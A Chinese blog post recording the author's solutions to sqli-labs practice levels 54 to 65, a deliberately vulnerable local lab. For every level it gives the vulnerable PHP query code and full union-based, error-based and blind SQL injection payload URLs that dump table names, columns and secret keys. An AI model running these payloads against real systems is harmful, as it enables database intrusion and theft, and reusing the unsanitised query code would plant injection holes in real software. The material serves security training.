SQLI-LAB  的 实战记录(Less 54 - Less 65)

最新推荐文章于 2022-09-19 01:38:27 发布
最新推荐文章于 2022-09-19 01:38:27 发布
阅读量3.7k 收藏 1
点赞数
分类专栏: sql注入 文章标签: sqli-lab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21500173/article/details/51993845
版权

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。

Less - 54 Challenge-1

(第54节:挑战 - 1)

Test:

     http://localhost/sqli-lab/Less-54/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 10 attempts
注:数据库名:challenges 最多尝试次数:10

     http://localhost/sqli-lab/Less-54/index.php?id=1') union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-54/index.php?id=1' union select 1,2,3 --+

注:正常,id周围是单引号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          //2x51x9lc2b

     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='2x51x9lc2b' --+
          //id,sessid,secret_QD6G,tryy

     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,group_concat(secret_QD6G),group_concat(sessid) from challenges.2x51x9lc2b --+
          //t5OPJLdkJ60DsyF7T1ZL3rfD
          //140491cdf5b17300fc51147a33ae86bf

注:正则匹配直接暴表名,列名:
     http://localhost/sqli-lab/Less-54/index.php?id=0' union select 1,table_name,column_name from information_schema.columns where column_name regexp '^secret_[A-Z]{4}$' limit 0,1;

Less - 55 Challenge-2

(第55节:挑战 - 2)

Test:

     http://localhost/sqli-lab/Less-55/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注:数据库名:challenges 最多尝试次数:14

     http://localhost/sqli-lab/Less-55/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-55/index.php?id=1") union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-55/index.php?id=1) union select 1,2,3 --+

注:正常,id周围是一层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){  
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          // tyqb9xz99r

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='tyqb9xz99r' --+
          // id,sessid,secret_0LLE,tryy

     http://localhost/sqli-lab/Less-55/index.php?id=0) union select 1,group_concat(secret_0LLE),group_concat(sessid) from challenges.tyqb9xz99r --+
          // HvXC6g9NxUeGwZtpfdEYCtUO
          // 486412045b0a355f953e5aa5c8446bcb

Less - 56 Challenge-3

(第56节:挑战 - 3)

Test:

     http://localhost/sqli-lab/Less-56/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注:数据库名:challenges 最多尝试次数:14

     http://localhost/sqli-lab/Less-56/index.php?id=1' union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-56/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-56/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-56/index.php?id=1") union select 1,2,3 --+

注:正常,id周围是双引号和一层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          // l1meh6v8xf

     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l1meh6v8xf' --+
          // id,sessid,secret_ZIEU,tryy

     http://localhost/sqli-lab/Less-56/index.php?id=0') union select 1,group_concat(secret_ZIEU),group_concat(sessid) from challenges.l1meh6v8xf --+
          //3zjx2Ef32x2clWJlRlS4n2wc
          // 2de68a7c5e3db6a836ab8f5f109416b8

Less - 57 Challenge-4

(第57节:挑战 - 4)

Test:

     http://localhost/sqli-lab/Less-57/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 14 attempts
注:数据库名:challenges 最多尝试次数:14

     http://localhost/sqli-lab/Less-57/index.php?id=1") union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-57/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-57/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-57/index.php?id=1" union select 1,2,3 --+

注:正常,id周围是双引号

Sourse Code:

$id= '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){   
     echo 'Your Login name:'. $row['username'];
     echo 'Your Password:' .$row['password'];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
          // la5spfxomc

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='la5spfxomc' --+
          // id,sessid,secret_D2E9,tryy

     http://localhost/sqli-lab/Less-57/index.php?id=0" union select 1,group_concat(secret_D2E9),group_concat(sessid) from challenges.la5spfxomc --+
          // AkXpuSMRL2Mjnxbu6ChgdDkI
          // 2c26f9a59b0ba61233e6fc0af8e47f14

Less - 58 Challenge-5

(第58节:挑战 - 5)

Test:

     http://localhost/sqli-lab/Less-58/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-58/index.php?id=1' union select 1,2,3 --+

注:正常

     http://localhost/sqli-lab/Less-58/index.php?id=1') union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘) union select 1,2,3 – ’ LIMIT 0,1’ at line 1
注:id周围是单引号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error());  
}

Solution:

     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //qrso3pw6sh::challenges::1

     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='qrso3pw6sh' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_MV87,tryy::1

     http://localhost/sqli-lab/Less-58/index.php?id=0' union select 1,2,3 from (select count(*),concat((select concat(secret_MV87,0x3a, 0x3a) from challenges.qrso3pw6sh limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // 3XJM8hjFz6KNK5aoNUSApgRW::1

Less - 59 Challenge-6

(第59节:挑战 - 6)

Test:

     http://localhost/sqli-lab/Less-59/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-59/index.php?id=1' union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” union select 1,2,3 – LIMIT 0,1’ at line 1
注:id周围没有符号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // b3ndcj1o8v::challenges::1

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='b3ndcj1o8v' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_ZWS2,tryy::1

     http://localhost/sqli-lab/Less-59/index.php?id=0 union select 1,2,3 from (select count(*),concat((select concat(secret_ZWS2 ,0x3a, 0x3a) from challenges.b3ndcj1o8v limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // zhEVMVgMavK0k92OSv8zmTTm::1

Less - 60 Challenge-7

(第60节:挑战 - 7)

Test:

     http://localhost/sqli-lab/Less-60/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-60/index.php?id=1" union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3 – “) LIMIT 0,1’ at line 1
注:id周围是双引号和一层括号

Sourse Code:

$id = '("'.$id.'")';
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){  
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error());  
}

Solution:

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //p9gd2w7p0n::challenges::1

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='p9gd2w7p0n' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_THZK,tryy::1

     http://localhost/sqli-lab/Less-60/index.php?id=0") union select 1,2,3 from (select count(*),concat((select concat(secret_THZK ,0x3a, 0x3a) from challenges.p9gd2w7p0n limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // OSpAsCGlNQ8qbUtTnEXHd0WL::1

Less - 61 Challenge-8

(第61节:挑战 - 8)

Test:

     http://localhost/sqli-lab/Less-61/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 5 attempts
注:数据库名:challenges 最多尝试次数:5

     http://localhost/sqli-lab/Less-61/index.php?id=1' union select 1,2,3 --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘union select 1,2,3 – ‘)) LIMIT 0,1’ at line 1
注:id周围是单引号和两层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a,database(),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //t44dfrest6::challenges::1

     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='t44dfrest6' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          //id,sessid,secret_BN4M,tryy::1

     http://localhost/sqli-lab/Less-61/index.php?id=0')) union select 1,2,3 from (select count(*),concat((select concat(secret_BN4M,0x3a, 0x3a) from challenges.t44dfrest6 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
          // dqlfs35mo8ZZlYKFZIvXboSe::1

Less - 62 Challenge-9

(第62节:挑战 - 9)

Test:

     http://localhost/sqli-lab/Less-62/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-62/index.php?id=1' union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-62/index.php?id=1') union select 1,2,3 --+

注:正常,id周围是单引号和一层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 97 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 109 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 115 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 119 --+
          //表名 第一个字符:w
          // wlo99z7cua

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 16) = 16 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 4) = 4 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select column_name from information_schema.columns limit 2,1),8,1)) %26 2) = 2 --+
          //10110 = 22  ,列名中倒数第四个字符:V
          // secret_VUBV

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 64 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 53 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ascii(substr((select secret_VUBV from wlo99z7cua limit 0,1) ,1,1))) < 50 --+

     http://localhost/sqli-lab/Less-62/index.php?id=1') and (ord(substr((select secret_VUBV from wlo99z7cua limit 0,1),1,1)) %26 1) = 1 --+
          // key 的 第一个字符:1
          // 1kqTprKdfAt6VGFEoEcpYgjG

注:随机值
表名 10位 由 小写字母和数字 组成
secret_XXXX 后四位由 大写字母和数字 组成
key 24位 由 大小写字母和数字 组成

Less - 63 Challenge-10

(第63节:挑战 - 10)

Test:

     http://localhost/sqli-labess-63/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-63/index.php?id=1') union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-63/index.php?id=1' union select 1,2,3 --+

注:正常,id周围是单引号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());  
}

Solution:

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 96 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 77 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) > 70 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ascii(substr((select secret_8FVY from gelqg5ya7p limit 0,1) ,1,1))) < 73 --+

     http://localhost/sqli-lab/Less-63/index.php?id=1' and (ord(substr((select secret_8FVY from  gelqg5ya7p limit 0,1),1,1)) %26 1) = 1 --+
          // key 的 第一个字符:G
          //  Gd65kBLDXbCY7wrwRq5jzM4l

Less - 64 Challenge-11

(第64节:挑战 - 11)

Test:

     http://localhost/sqli-lab/Less-64/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-64/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1" union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1") union select 1,2,3 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1) union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-64/index.php?id=1)) union select 1,2,3 --+

注:正常,id周围是两层括号

Sourse Code:

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from  tsgl6i8osu limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from  tsgl6i8osu limit 0,1) ,1,1))) > 97 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 109 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 106 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) < 104 --+

     http://localhost/sqli-lab/Less-64/index.php?id=1)) and (ascii(substr((select secret_S0LE from tsgl6i8osu limit 0,1) ,1,1))) = 103 --+
          // key 的 第一个字符:g
          //  gpu9QBywZI8jL2M7Uj6DDELa

Less - 65 Challenge-12

(第65节:挑战 - 12)

Test:

     http://localhost/sqli-lab/Less-65/index.php

The objective of this challenge is to dump the (secret key) from only random table from Database (‘CHALLENGES’) in Less than 130 attempts
注:数据库名:challenges 最多尝试次数:130

     http://localhost/sqli-lab/Less-65/index.php?id=1" union select 1,2,3 --+

注:不显示正确信息

     http://localhost/sqli-lab/Less-65/index.php?id=1' union select 1,2,3 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1') union select 1,2,3 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") union select 1,2,3 --+

注:正常,id周围是双引号和一层括号

Sourse Code:

$id = '"'.$id.'"';
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
     $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
     $pass = array_reverse($unames);
     echo 'Your Login name : '. $unames[$row['id']];
     echo 'Your Password : ' .$pass[$row['id']];
}else{
     //print_r(mysql_error());
}

Solution:

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 64 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 97 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 77 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 84 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) < 88 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) > 85 --+

     http://localhost/sqli-lab/Less-65/index.php?id=1") and (ascii(substr((select secret_LARH from dfo1zhhb56 limit 0,1) ,1,1))) = 87 --+
          // key 的 第一个字符:W
          // Wa0mYczFC0wFXygjAFaCA1Tb
战狼767
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs(54-65)
qq_43395215的博客
08-26 406
文章目录第54关:第55关:第56关:第57关:第58关:第59关:第60关:第61关:第62关:第63关:第64关:第65关: 第54关: 根据这一关的提示,我们可以知道数据库的名字“chellenges”,我们需要知道“dump”的密码,才能通关,而且只有10次尝试机会 因为只有10次机会,所以判断闭合时需要猜测最常见的,所以先判断单引号、然后双引号、整形、最后括号 闭合方式: /Less-54/?id=-1' union select 1,2,3--+ 因为一直到库名,需要判断表名,注意语句要一次正
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
m0_54899775的博客
12-29 1605
sqli-labs Less-54、55、56、57(sqli-labs闯关指南 54、55、56、57)
Sqli-labs之Less:54-57
m0_46315342的博客
05-29 249
Sqli-labs之Less:54-57 ...
sqli-labs通关攻略54-65[Challenges]
热门推荐
Keepb1ue的博客
09-02 1万+
Advanced Injections 文章目录Advanced Injectionsless-54less-55less-56less-60less-62less-63less-64less-65 最后一篇补上。 less-54 字符型注入,只不过这里只能限制十次查询,超过十次就会随机更换表名和字段名。也就是说我们要在10次内查询所有结果,这其实是够的。 http://127.0.0.1/sql-labs/less-54/index.php?id=-1' union select 1,version(
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab注入练习源码
06-25
通过sqli-lab实战练习,你不仅可以学习到如何进行SQL注入攻击,更重要的是,你还能了解到如何在实际开发中预防这种攻击,提升你的Web应用安全性。因此,无论你是开发者还是安全专业人员,这个平台都是提升SQL注入...
SQLi-Lab:每个SQL注入实验室
03-29
8. **实战演练**:通过SQLi-Lab提供的各种挑战,实践上述理论知识,增强识别和修复SQL注入漏洞的能力。 9. **工具使用**:了解和使用SQL注入检测工具,如Burp Suite、sqlmap等,以及如何利用它们进行自动化渗透测试...
Sqli-labs Less54-65 挑战
kevinhanser
08-10 310
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 54: GET - challenge - Union- 10 queries allowed - Veriation1 源代码 // Checking the cookie on the page and populate the table with random value. $tim...
Sqli-labs 复习 Less54-65 挑战
kevinhanser
08-12 778
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 挑战关卡 Less-54 union - 1 源代码 // Checking the cookie on the page and populate the table with random value. $times=10 setcookie("challen...
sqli-labs(54-65)终章
qq_43579362的博客
03-04 628
Page4終章以为会很难,结果就是限定注入次数,其他和前面一样,虽然很接近现实注入,但是还是可以采取一些手段来‘无限’注入,比如代理,脚本等。。。 Less-54~57 这4关都是使用联合查询注入,so easy。。。 Less-54 闭合方式:id=1'--+ Less-55 闭合方式:id=1)--+ Less-56 闭合方式:id=1')--+ Less-57 闭合方式:id="--+ Le...
SQLi-labs 注入 54-75关
感恩
09-19 326
SQLi-labs 注入 54-75关
sqlilabs54-65详细教程
黑白的博客
11-08 975
声明 学习SQL注入,提高网路安全能力 information_schema 过关之前先要了解一下,我们要研究的是SQL注入,所以有必要先了解一下MYSQL数据库的重要库(表集合):information_schema,这个库中,存在着所有数据库的信息。。。这就意味着,如果我们可以利用漏洞,仅仅去查询这个库,就可以拿到关于数据库的大量信息了。 先看一下,这个数据库的位置 SCHEMATA 该表记录着所有的数据库名 图中,mysql命令行输入如喜爱命令,会显示目前为止所有的数据库(图左1) show dat
Sqli-labs less 55
weixin_34397291的博客
08-11 82
Less-55 本关的sql语句为: $sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1"; 其余和less54是一样的,所以我们将上述的语句前添加 ) 即可,但是这里要求次数为14次。 示例payload: http://127.0.0.1/sqli-labs/Less-55/?id=-1)union select 1...
Sqli-labs less 54
weixin_34347651的博客
08-11 86
第四部分/page-4 Challenges Less-54 此系列主要是一个进阶的学习,将前面学到的知识进行更深次的运用。这一关我们主要考察的依旧是字符型注入,但是只能尝试十次。所以需要在尝试的时候进行思考。如何能更少的减少次数。这里的表名和密码等是每十次尝试后就强制进行更换。 因为已经知道了数据库名字叫做challenges,所以我们需要知道表名。 http://127.0.0....
sqli-labs————Less-54(第四部分:提高部分)
Fly_鹏程万里
05-22 1026
前言在接下来的几关中将会对前面所学习的内容做一个复习,同时也会通过在复杂环境中的应用来提高注入技巧。Less-54源代码:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt; &lt;html xm...
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值